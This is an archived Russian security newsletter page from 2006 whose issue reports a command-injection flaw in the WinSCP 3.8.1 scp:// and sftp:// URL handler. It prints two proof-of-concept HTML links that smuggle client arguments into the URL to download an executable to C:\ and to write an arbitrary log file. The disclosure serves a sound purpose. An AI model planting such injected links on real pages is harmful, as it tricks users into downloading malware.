Отправляет email-рассылки с помощью сервиса Sendsay

IT-безопасность в быту и не только

Рассылка закрыта

При закрытии подписчики были переданы в рассылку "Безопасность. Статьи, новости, комментарии" на которую и рекомендуем вам подписаться.

Вы можете найти рассылки сходной тематики в Каталоге рассылок.

  Июнь 2006  
 1
 2
 3
 4
 5
 6
 7
 8
08.06.2006
07:05:38
13:05:05
 9
09.06.2006
07:05:21
13:05:14
10
11
12
13
14
15
16
17
18
18.06.2006
07:05:13
10:05:28
19
20
21
22
23
24
25
26
27
28
29
30
Автор
Forester

Статистика

1.394 подписчиков
-1 за неделю
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в WinSCP.


Компьютер для продвинутых пользователей
В этом выпуске:
WinSCP
ПО: WinSCP
Версия: 3.8.1

О WinSCP:
SFTP клиент для Windows использующий SSH и имеющий открытый код. Протокол Legacy SCP входит в поддержку.
Уязвимость:
Строка ввода (scp:// sftp://) не проверяется, что может нам обеспечить возможность вставлять любые команды.
Если вы создадите HTML страницу со следующий содержанием:
<a href="scp://user:password@host:22/%22%20/console%20/command%20%22lcd% 20c:\%22%20%22get%201.exe%22%20exit">download malware.exe</a>
и кликните по ссылке, то вы автоматически скачаете malware.exe с С:\.
Щелкнув на <a href="scp://jelmer@127.0.0.1:22/%22%20%22/log=c:%5csomefile%22"log</a> мы получаем файл 'somefile'.
Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru
В избранное